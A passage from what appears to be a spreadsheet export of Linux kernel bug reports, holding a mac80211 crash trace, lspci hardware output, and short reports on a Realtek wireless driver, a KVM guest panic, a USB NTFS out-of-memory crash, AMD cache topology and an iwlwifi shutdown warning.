kernel: DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Sep 1 21:53:25 better kernel: Process wpa_supplicant (pid: 3405, threadinfo ffff88022c1e4000, task ffff88022c33ec10) Sep 1 21:53:25 better kernel: Stack: Sep 1 21:53:25 better kernel: ffffffffa0499769 0000000105d85fc1 ffff880232948910 ffff8801448e6c00 Sep 1 21:53:25 better kernel: ffff880232f40400 0000000000000000 ffff88022c1e5a38 ffff88022c1e59f8 Sep 1 21:53:25 better kernel: ffffffffa04a0503 ffff88022c1e5a98 ffffffffa0450557 ffff880200000001 Sep 1 21:53:25 better kernel: Call Trace: Sep 1 21:53:25 better kernel: [&lt;ffffffffa0499769&gt;] ? ieee80211_mgd_auth+0x1b9/0x1e0 [mac80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa04a0503&gt;] ieee80211_auth+0x13/0x20 [mac80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa0450557&gt;] __cfg80211_mlme_auth+0x1a7/0x310 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffff813aeea5&gt;] ? _raw_spin_unlock_irqrestore+0x75/0x80 Sep 1 21:53:25 better kernel: [&lt;ffffffffa0452d8f&gt;] cfg80211_conn_do_work+0x21f/0x230 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffff810d033e&gt;] ? kmemdup+0x3e/0x50 Sep 1 21:53:25 better kernel: [&lt;ffffffffa04543f2&gt;] __cfg80211_connect+0x382/0x560 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa04575f8&gt;] cfg80211_mgd_wext_connect+0x118/0x1d0 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa04579fd&gt;] cfg80211_mgd_wext_siwessid+0x10d/0x1e0 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa0455a25&gt;] cfg80211_wext_siwessid+0x35/0x40 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffff8138bdc4&gt;] ioctl_standard_iw_point+0x1a4/0x3e0 Sep 1 21:53:25 better kernel: [&lt;ffffffffa04559f0&gt;] ? cfg80211_wext_giwessid+0x50/0x50 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffff81304c02&gt;] ? rtnl_lock+0x12/0x20 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c000&gt;] ? ioctl_standard_iw_point+0x3e0/0x3e0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c0b9&gt;] ioctl_standard_call+0xb9/0xc0 Sep 1 21:53:25 better kernel: [&lt;ffffffff812f347c&gt;] ? __dev_get_by_name+0x9c/0xd0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c000&gt;] ? ioctl_standard_iw_point+0x3e0/0x3e0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c2a1&gt;] wext_ioctl_dispatch.constprop.11+0x141/0x180 Sep 1 21:53:25 better kernel: [&lt;ffffffff810d633e&gt;] ? might_fault+0x4e/0xa0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c3da&gt;] wext_handle_ioctl+0x3a/0x90 Sep 1 21:53:25 better kernel: [&lt;ffffffff812f7a96&gt;] dev_ioctl+0xd6/0x6e0 Sep 1 21:53:25 better kernel: [&lt;ffffffff812dceda&gt;] sock_ioctl+0x10a/0x2f0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8110e5b6&gt;] do_vfs_ioctl+0x96/0x560 Sep 1 21:53:25 better kernel: [&lt;ffffffff813afbac&gt;] ? sysret_check+0x27/0x62 Sep 1 21:53:25 better kernel: [&lt;ffffffff8110eb11&gt;] sys_ioctl+0x91/0xa0 Sep 1 21:53:25 better kernel: [&lt;ffffffff813afb7b&gt;] system_call_fastpath+0x16/0x1b Sep 1 21:53:25 better kernel: Code: 8b 5c 16 f8 4c 89 07 4c 89 4f 08 4c 89 54 17 f0 4c 89 5c 17 f8 c3 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 48 83 fa 08 72 1a &lt;4c&gt; 8b 06 4c 8b 4c 16 f8 4c 89 07 4c 89 4c 17 f8 c3 66 0f 1f 84 Sep 1 21:53:25 better kernel: RIP [&lt;ffffffff811d7836&gt;] memcpy+0xc6/0x120 Sep 1 21:53:25 better kernel: RSP &lt;ffff88022c1e59b0&gt; Sep 1 21:53:25 better kernel: CR2: ffff8800b28a4ac0 Sep 1 21:53:25 better kernel: ---[ end trace 609dcd858f5aec07 ]--- Sep 1 21:53:25 better kernel: BUG: sleeping function called from invalid context at kernel/rwsem.c:21 Sep 1 21:53:25 better kernel: in_atomic(): 0, irqs_disabled(): 1, pid: 3405, name: wpa_supplicant Sep 1 21:53:25 better kernel: INFO: lockdep is turned off. Sep 1 21:53:25 better kernel: irq event stamp: 2463848 Sep 1 21:53:25 better kernel: hardirqs last enabled at (2463847): [&lt;ffffffff81045dd1&gt;] local_bh_enable_ip+0x81/0x110 Sep 1 21:53:25 better kernel: hardirqs last disabled at (2463848): [&lt;ffffffff813af803&gt;] error_sti+0x5/0x6 Sep 1 21:53:25 better kernel: softirqs last enabled at (2463846): [&lt;ffffffffa043fb33&gt;] cfg80211_get_bss+0x143/0x1a0 [cfg80211] Sep 1 21:53:25 better kernel: softirqs last disabled at (2463844): [&lt;ffffffff813ae971&gt;] _raw_spin_lock_bh+0x11/0x50 Sep 1 21:53:25 better kernel: Pid: 3405, comm: wpa_supplicant Tainted: G D C 3.0.3-melech #1 Sep 1 21:53:25 better kernel: Call Trace: Sep 1 21:53:25 better kernel: [&lt;ffffffff81072740&gt;] ? print_irqtrace_events+0xd0/0xe0 Sep 1 21:53:25 better kernel: [&lt;ffffffff810328cf&gt;] __might_sleep+0xef/0x120 Sep 1 21:53:25 better kernel: [&lt;ffffffff813adb7f&gt;] down_read+0x1f/0x57 Sep 1 21:53:25 better kernel: [&lt;ffffffff81088ea6&gt;] acct_collect+0x46/0x1b0 Sep 1 21:53:25 better kernel: [&lt;ffffffff81043e39&gt;] do_exit+0x659/0x840 Sep 1 21:53:25 better kernel: [&lt;ffffffff81041981&gt;] ? kmsg_dump+0xf1/0x120 Sep 1 21:53:25 better kernel: [&lt;ffffffff810061fd&gt;] oops_end+0x9d/0xe0 Sep 1 21:53:25 better kernel: [&lt;ffffffff813a4951&gt;] no_context+0x204/0x213 Sep 1 21:53:25 better kernel: [&lt;ffffffff813a4aea&gt;] __bad_area_nosemaphore+0x18a/0x1ad Sep 1 21:53:25 better kernel: [&lt;ffffffff813a4b1b&gt;] bad_area_nosemaphore+0xe/0x10 Sep 1 21:53:25 better kernel: [&lt;ffffffff810259e9&gt;] do_page_fault+0x3b9/0x470 Sep 1 21:53:25 better kernel: [&lt;ffffffff810756d4&gt;] ? mark_held_locks+0x64/0x90 Sep 1 21:53:25 better kernel: [&lt;ffffffff813aeedb&gt;] ? _raw_spin_unlock_irq+0x2b/0x60 Sep 1 21:53:25 better kernel: [&lt;ffffffff811d7cbd&gt;] ? trace_hardirqs_off_thunk+0x3a/0x3c Sep 1 21:53:25 better kernel: [&lt;ffffffff813af61f&gt;] page_fault+0x1f/0x30 Sep 1 21:53:25 better kernel: [&lt;ffffffff811d7836&gt;] ? memcpy+0xc6/0x120 Sep 1 21:53:25 better kernel: [&lt;ffffffffa0499769&gt;] ? ieee80211_mgd_auth+0x1b9/0x1e0 [mac80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa04a0503&gt;] ieee80211_auth+0x13/0x20 [mac80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa0450557&gt;] __cfg80211_mlme_auth+0x1a7/0x310 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffff813aeea5&gt;] ? _raw_spin_unlock_irqrestore+0x75/0x80 Sep 1 21:53:25 better kernel: [&lt;ffffffffa0452d8f&gt;] cfg80211_conn_do_work+0x21f/0x230 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffff810d033e&gt;] ? kmemdup+0x3e/0x50 Sep 1 21:53:25 better kernel: [&lt;ffffffffa04543f2&gt;] __cfg80211_connect+0x382/0x560 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa04575f8&gt;] cfg80211_mgd_wext_connect+0x118/0x1d0 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa04579fd&gt;] cfg80211_mgd_wext_siwessid+0x10d/0x1e0 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffffa0455a25&gt;] cfg80211_wext_siwessid+0x35/0x40 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffff8138bdc4&gt;] ioctl_standard_iw_point+0x1a4/0x3e0 Sep 1 21:53:25 better kernel: [&lt;ffffffffa04559f0&gt;] ? cfg80211_wext_giwessid+0x50/0x50 [cfg80211] Sep 1 21:53:25 better kernel: [&lt;ffffffff81304c02&gt;] ? rtnl_lock+0x12/0x20 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c000&gt;] ? ioctl_standard_iw_point+0x3e0/0x3e0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c0b9&gt;] ioctl_standard_call+0xb9/0xc0 Sep 1 21:53:25 better kernel: [&lt;ffffffff812f347c&gt;] ? __dev_get_by_name+0x9c/0xd0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c000&gt;] ? ioctl_standard_iw_point+0x3e0/0x3e0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c2a1&gt;] wext_ioctl_dispatch.constprop.11+0x141/0x180 Sep 1 21:53:25 better kernel: [&lt;ffffffff810d633e&gt;] ? might_fault+0x4e/0xa0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8138c3da&gt;] wext_handle_ioctl+0x3a/0x90 Sep 1 21:53:25 better kernel: [&lt;ffffffff812f7a96&gt;] dev_ioctl+0xd6/0x6e0 Sep 1 21:53:25 better kernel: [&lt;ffffffff812dceda&gt;] sock_ioctl+0x10a/0x2f0 Sep 1 21:53:25 better kernel: [&lt;ffffffff8110e5b6&gt;] do_vfs_ioctl+0x96/0x560 Sep 1 21:53:25 better kernel: [&lt;ffffffff813afbac&gt;] ? sysret_check+0x27/0x62 Sep 1 21:53:25 better kernel: [&lt;ffffffff8110eb11&gt;] sys_ioctl+0x91/0xa0 Sep 1 21:53:25 better kernel: [&lt;ffffffff813afb7b&gt;] system_call_fastpath+0x16/0x1b ~$ lspci -vv 00:00.0 Host bridge: Intel Corporation 2nd Generation Core Processor Family DRAM Controller (rev 09) Subsystem: Lenovo Device 21ce Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: &lt;access denied&gt; Kernel driver in use: agpgart-intel 00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09) (prog-if 00 [VGA controller]) Subsystem: Lenovo Device 21ce Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 44 Region 0: Memory at d0000000 (64-bit, non-prefetchable) [size=4M] Region 2: Memory at c0000000 (64-bit, prefetchable) [size=256M] Region 4: I/O ports at 5000 [size=64] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: &lt;access denied&gt; Kernel driver in use: i915 00:16.0 Communication controller: Intel Corporation 6 Series/C200 Series Chipset Family MEI Controller #1 (rev 04) Subsystem: Lenovo Device 21ce Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at d2525000 (64-bit, non-prefetchable) [size=16] Capabilities: &lt;access denied&gt; Kernel driver in use: mei 00:16.3 Serial controller: Intel Corporation 6 Series/C200 Series Chipset Family KT Controller (rev 04) (prog-if 02 [16550]) Subsystem: Lenovo Device 21ce Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 10 Region 0: I/O ports at 50b0 [size=8] Region 1: Memory at d252c000 (32-bit, non-prefetchable) [size=4K] Capabilities: &lt;access denied&gt; 00:19.0 Ethernet controller: Intel Corporation 82579LM Gigabit Network Connection (rev 04) Subsystem: Lenovo Device 21ce Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 46 Region 0: Memory at d2500000 (32-bit, non-prefetchable) [size=128K] Region 1: Memory at d252b000 (32-bit, non-prefetchable) [size=4K] Region 2: I/O ports at 5080 [size=32] Capabilities: &lt;access denied&gt; Kernel driver in use: e1000e 00:1a.0 USB Controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #2 (rev 04) (prog-if 20 [EHCI]) Subsystem: Lenovo Device 21ce Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at d252a000 (32-bit, non-prefetchable) [size=1K] Capabilities: &lt;access denied&gt; Kernel driver in use: ehci_hcd 00:1b.0 Audio device: Intel Corporation 6 Series/C200 Series Chipset Family High Definition Audio Controller (rev 04) Subsystem: Lenovo Device 21ce Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 43 Region 0: Memory at d2520000 (64-bit, non-prefetchable) [size=16K] Capabilities: &lt;access denied&gt; Kernel driver in use: HDA Intel 00:1c.0 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 1 (rev b4) (prog-if 00 [Normal decode]) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport 00:1c.1 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 2 (rev b4) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 Memory behind bridge: d2400000-d24fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport 00:1c.3 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 4 (rev b4) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=05, subordinate=0c, sec-latency=0 I/O behind bridge: 00004000-00004fff Memory behind bridge: d1c00000-d23fffff Prefetchable memory behind bridge: 00000000d0400000-00000000d0bfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport 00:1c.4 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 5 (rev b4) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=0d, subordinate=0d, sec-latency=0 I/O behind bridge: 00003000-00003fff Memory behind bridge: d1400000-d1bfffff Prefetchable memory behind bridge: 00000000d0c00000-00000000d13fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport 00:1d.0 USB Controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #1 (rev 04) (prog-if 20 [EHCI]) Subsystem: Lenovo Device 21ce Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 0: Memory at d2529000 (32-bit, non-prefetchable) [size=1K] Capabilities: &lt;access denied&gt; Kernel driver in use: ehci_hcd 00:1f.0 ISA bridge: Intel Corporation QM67 Express Chipset Family LPC Controller (rev 04) Subsystem: Lenovo Device 21ce Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: &lt;access denied&gt; 00:1f.2 SATA controller: Intel Corporation 6 Series/C200 Series Chipset Family 6 port SATA AHCI Controller (rev 04) (prog-if 01 [AHCI 1.0]) Subsystem: Lenovo Device 21ce Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 42 Region 0: I/O ports at 50a8 [size=8] Region 1: I/O ports at 50bc [size=4] Region 2: I/O ports at 50a0 [size=8] Region 3: I/O ports at 50b8 [size=4] Region 4: I/O ports at 5060 [size=32] Region 5: Memory at d2528000 (32-bit, non-prefetchable) [size=2K] Capabilities: &lt;access denied&gt; Kernel driver in use: ahci 00:1f.3 SMBus: Intel Corporation 6 Series/C200 Series Chipset Family SMBus Controller (rev 04) Subsystem: Lenovo Device 21ce Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin C routed to IRQ 18 Region 0: Memory at d2524000 (64-bit, non-prefetchable) [size=256] Region 4: I/O ports at efa0 [size=32] Kernel driver in use: i801_smbus 03:00.0 Network controller: Intel Corporation Centrino Ultimate-N 6300 (rev 35) Subsystem: Intel Corporation Centrino Ultimate-N 6300 3x3 AGN Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 45 Region 0: Memory at d2400000 (64-bit, non-prefetchable) [size=8K] Capabilities: &lt;access denied&gt; Kernel driver in use: iwlagn 0d:00.0 System peripheral: Ricoh Co Ltd Device e823 (rev 05) (prog-if 01) Subsystem: Lenovo Device 21ce Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at d1400000 (32-bit, non-prefetchable) [size=256] Capabilities: &lt;access denied&gt; Kernel driver in use: sdhci-pci</t>
  </si>
  <si>
    <t>Driver rtl8192cu fails to connect to HT-enabled AP</t>
  </si>
  <si>
    <t>3.1-rc4</t>
  </si>
  <si>
    <t>2011-09-02 19:08 UTC</t>
  </si>
  <si>
    <t>2012-01-13 19:02 UTC</t>
  </si>
  <si>
    <t>The driver fails to connect to any 802.11n connection when the maximum bit rate is set to be higher than 54 Mbps. The problem is that the 20/40 MHz flags are not set correctly.</t>
  </si>
  <si>
    <t>rhel5u5 guest panic when booting up</t>
  </si>
  <si>
    <t>3.2.0-rc7</t>
  </si>
  <si>
    <t>2012-01-06 02:59 UTC</t>
  </si>
  <si>
    <t>Jay Ren</t>
  </si>
  <si>
    <t>2012-01-31 09:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 72053 [details] rhel5u5 guest panic log Environment: ------------ Host OS (ia32/ia32e/IA64): ia32e Guest OS (ia32/ia32e/IA64): ia32e Guest OS Type (Linux/Windows): Linux(rhel5u5) kvm.git Commit:781f306789361d671187d9ddb518eea3ffda786a qemu-kvm Commit:2850e9e3d3119f98ff775a75503b2153836c7475 Host Kernel Version:3.2.0-rc7 Hardware: Westmere-EP Bug detailed description: -------------------------- rhel5u5 guest panic when booting up in the latest kvm upstream. When I tried rhel6u1 as a guest, I didn't met the guest panic issue. This should be a kvm kernel bug. kvm + qemu-kvm = result 781f3067 + 2850e9e3 = bad 08a95a51 + 2850e9e3 = good guest panic serial log is attached. Reproduce steps: ---------------- 1.start up a host with kvm (commit:781f3067) 2.qemu-system-x86_64 -mem 512 -hda /root/rhel5u5.img Current result: ---------------- guest panic Expected result: ---------------- guest boot up correctly Basic root-causing log: ---------------------- SMP alternatives: switching to UP code Freeing SMP alternatives: 32k freed ACPI: Core revision 20060707 general protection fault: 0000 [1] SMP last sysfs file: CPU 0 Modules linked in: Pid: 1, comm: swapper Not tainted 2.6.18-194.el5 #1 RIP: 0010:[&lt;ffffffff8007f1df&gt;] [&lt;ffffffff8007f1df&gt;] setup_p6_watchdog+0x2f/0x7a RSP: 0000:ffff81000114be50 EFLAGS: 00000246 RAX: 0000000000130079 RBX: 0000000000000186 RCX: 0000000000000186 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00000000000003e8 RBP: 0000000000090000 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: ffff8100010353e8 R13: 00000000000000c1 R14: 0000000000000000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffffffff803cb000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000000000000000 CR3: 0000000000201000 CR4: 00000000000006e0 Process swapper (pid: 1, threadinfo ffff81000114a000, task ffff81001fd3e7a0) Stack: 00000000000003e8 0000000000000000 00000000000000ff ffffffff8007efcf ffffffff8043e288 ffffffff800795d1 0000000000000800 ffffffff80078e9a 0000000000000800 ffffffff80411712 0000000000090000 0000000000000800 Call Trace: [&lt;ffffffff8007efcf&gt;] lapic_watchdog_init+0x1b/0x3c [&lt;ffffffff800795d1&gt;] setup_apic_nmi_watchdog+0x42/0x8a [&lt;ffffffff80078e9a&gt;] setup_local_APIC+0x17b/0x187 [&lt;ffffffff80411712&gt;] smp_prepare_cpus+0x34a/0x360 [&lt;ffffffff804078c5&gt;] init+0x62/0x2f7 [&lt;ffffffff8005efb1&gt;] child_rip+0xa/0x11 [&lt;ffffffff801824cc&gt;] acpi_ds_init_one_object+0x0/0x80 [&lt;ffffffff80407863&gt;] init+0x0/0x2f7 [&lt;ffffffff8005efa7&gt;] child_rip+0x0/0x11</t>
  </si>
  <si>
    <t>Huang Ying</t>
  </si>
  <si>
    <t>Kernel crash "Out of memory error by X" when using NTFS file system on external USB Hard drive</t>
  </si>
  <si>
    <t>2012-01-14 16:23 UTC</t>
  </si>
  <si>
    <t>2012-06-13 15:13 UTC</t>
  </si>
  <si>
    <t>Created attachment 72066 [details] dmesg output and other system details The device that triggers the fault is a 1TB external USB hard drive. The device is a USB 3.0 device but the system crashes with OOM errors in either 3.0 or 2.0 USB motherboard ports. The system board is a ASUS M5A97 PRO mother board with a AMD Phenom(tm) II X6 1100T Processor and 16GByte DDR3 memory. The fault appears to be triggered by simply file copying a large file16Gbyte+ off the external drive over the USB system. The system is 100% stable in all other respects. The problem was first noticed on an earlier kernel (from memory 3.0.6 possibly) but appeared only when used on a 3.0 USB port, moving the device onto a 2.0 USB port "cured" the problem. However the device now appears to be failing on usb 2.0 as well.</t>
  </si>
  <si>
    <t>AMD Bulldozer cache structure reported wrong</t>
  </si>
  <si>
    <t>2012-01-19 14:11 UTC</t>
  </si>
  <si>
    <t>Steffen Arntz</t>
  </si>
  <si>
    <t>1) /sys/devices/system/cpu/cpu*/cache/index2/shared_cpu_list contains a single processor number, there should be two of them there (both cores of the module) 2) I think the L1 instruction part is shared among the entire dual-core module as well, so same problem with /sys/devices/system/cpu/cpu*/cache/index1/shared_cpu_list 2) if the L1 data size is 64kB per core, then /sys/devices/system/cpu/cpu*/cache/index0/size should report 64KB instead of 16KB It appeared to me looking at lstopos output: https://svn.open-mpi.org/trac/hwloc/ticket/62 and they had a look at it and found the Kernel reporting things wrong.</t>
  </si>
  <si>
    <t>Kernel warning related to iwlwifi, when switching off laptop Dell Vostro 3750</t>
  </si>
  <si>
    <t>3.1.6</t>
  </si>
  <si>
    <t>2012-01-21 14:53 UTC</t>
  </si>
  <si>
    <t>2012-01-26 16:56 UTC</t>
  </si>
  <si>
    <t>When I switch off my laptop running with kernel 3.1.6, I can see the following warnings in the /var/log/messages. Jan 16 01:00:02 WZLap shutdown[3252]: shutting down for system halt Jan 16 01:00:05 WZLap kernel: [ 830.665169] ------------[ cut here ]------------ Jan 16 01:00:05 WZLap kernel: [ 830.667477] WARNING: at drivers/net/wireless/iwlwifi/iwl-agn-lib.c:1766 iwlagn_set_rxon_chain+0x107/0x1b2 [iwlagn]() Jan 16 01:00:05 WZLap kernel: [ 830.669864] Hardware name: Dell System Vostro 3750 Jan 16 01:00:05 WZLap kernel: [ 830.672253] invalid SMPS mode 0 Jan 16 01:00:05 WZLap kernel: [ 830.672287] Modules linked in: hidp hid acpi_cpufreq mperf tun cpufreq_conservative cpufreq_userspace cpufreq_stats cpufreq_powersave ipx p8023 parport_pc ppdev lp parport bnep rfcomm binfmt_misc uinput fuse nfsd nfs lockd fscache auth_rpcgss nfs_acl sunrpc ip6table_filter ip6_tables nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack xt_tcpudp xt_owner iptable_filter ip_tables x_tables loop sha256_generic cbc dm_crypt kvm_intel kvm snd_hda_codec_realtek joydev snd_hda_intel nouveau i915 snd_hda_codec snd_hwdep ttm drm_kms_helper uvcvideo videodev media v4l2_compat_ioctl32 snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_midi drm snd_rawmidi snd_seq_midi_event arc4 snd_seq 